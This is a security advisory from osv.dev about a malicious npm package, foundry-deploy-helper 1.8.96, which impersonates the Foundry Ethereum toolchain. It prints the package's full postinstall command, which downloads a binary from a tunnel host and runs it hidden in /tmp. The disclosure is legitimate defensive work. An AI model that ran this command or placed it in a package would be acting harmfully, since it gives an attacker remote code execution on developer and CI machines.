foundry-deploy-helper @1.8.96
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4241
Ecosystem
npm
Summary
package.json declares a postinstall hook that runs node -e with an inline child_process.execSync call whose shell command is:

curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache &

On npm install, an unsigned, unpinned, opaque binary is downloaded from an anonymous Pinggy free-tunnel host (a mutable, throwaway tunnel endpoint unrelated to any legitimate publisher), staged at the hidden dotfile path /tmp/.node-cache, marked executable, and launched detached in the background (the trailing single &), with any error swallowed by a try/catch wrapper so the failure is not surfaced to the installer.

The package name foundry-deploy-helper, the fabricated repository URL github.com/foundry/foundry-deploy-helper, and the generic author Web3 Developer Tools <dev@foundry-tools.dev> impersonate the Foundry (foundry-rs) Ethereum toolchain to lure web3 developers into installing it. The fetch destination is not publisher-owned, the URL is not version-pinned, no hash or signature check is performed, the staging path is hidden, and the package's advertised purpose gives no plausible reason to fetch and execute an arbitrary binary at install time. Installing this package gives the operator of the Pinggy tunnel arbitrary code execution on the installer's machine; any host (developer workstation or CI runner) that ran npm install on this version with lifecycle scripts enabled should be treated as compromised.
Source: amazon-inspector (14ad9106b013b6e68056e1afe40a833d89b1c2037aab7b67d4b24bba1dbf4c77)